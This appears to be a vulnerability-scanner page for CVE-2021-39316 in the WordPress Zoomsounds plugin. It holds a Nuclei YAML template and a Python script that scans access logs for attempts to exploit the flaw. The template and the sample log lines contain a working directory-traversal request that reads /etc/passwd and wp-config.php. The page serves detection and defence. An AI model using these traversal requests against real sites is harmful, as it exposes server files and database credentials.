WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
ID: CVE-2021-39316
Severity: high
Author: daffainfo
Tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio
Description
WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter.
YAML Source
id: CVE-2021-39316

info:
  name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
  author: daffainfo
  severity: high
  description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
  impact: |
    Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure.
  remediation: |
    Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
    - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39316
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-39316
    cwe-id: CWE-22
    epss-score: 0.38985
    epss-percentile: 0.96896
    cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: digitalzoomstudio
    product: zoomsounds
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio

http:
  - method: GET
    path:
      - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206efbfb92d85618eb8fa1e92459de6ea44be70790cf9e27c0081922f82da32eb1022100b9c136266e39479e85af30aaf5de4d66d57fd34e4b860d49c909184a89fa1964:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39316.yaml"
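Scanning with the template above tells you whether a site is still exposed; the complementary defender task is to find exploitation attempts that already hit the server. The script below is an added example, not part of the Nuclei template or the plugin: it parses combined-format access-log lines, keeps only requests carrying action=dzsap_download, and flags any link value that contains a ".." segment (after undoing one extra layer of URL encoding, since parse_qs already decodes once). The log lines are constructed samples; a 200 response on a flagged request is treated as a likely successful read.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in combined format (not real traffic):
# lines 1-2 traverse via dzsap_download, line 3 is a legitimate download,
# line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2021:12:00:01 +0000] "GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1245 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2021:12:00:02 +0000] "GET /?action=dzsap_download&link=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3010 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2021:12:00:03 +0000] "GET /?action=dzsap_download&link=wp-content/uploads/track.mp3 HTTP/1.1" 200 4096000 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Aug/2021:12:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 2300 "-" "Mozilla/5.0"
"""

# Combined-log request line: client IP, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path segment delimited by / or \ (or at either end of the value).
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def is_traversal(value: str) -> bool:
    """True if value holds a '..' segment; decodes once more because parse_qs
    already stripped one layer, so double-encoded %252e%252e is caught too."""
    return TRAVERSAL_RE.search(unquote(value)) is not None

def classify(line: str):
    """Return a finding for a dzsap_download request whose link traverses
    directories, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if "dzsap_download" not in qs.get("action", []):
        return None
    bad = [v for v in qs.get("link", []) if is_traversal(v)]
    if not bad:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "link": unquote(bad[0])}

def scan_log(text: str) -> list:
    """Scan a whole log; HTTP 200 on a traversal link suggests the read worked."""
    return [f for f in map(classify, text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "likely successful read" if f["status"] == 200 else "attempt"
        print(f"{f['ts']} {f['ip']} {verdict}: link={f['link']}")
```

Run it against a real access log with scan_log(open(path).read()); any hit on a host still running a vulnerable version should be treated as a wp-config.php credential exposure until proven otherwise.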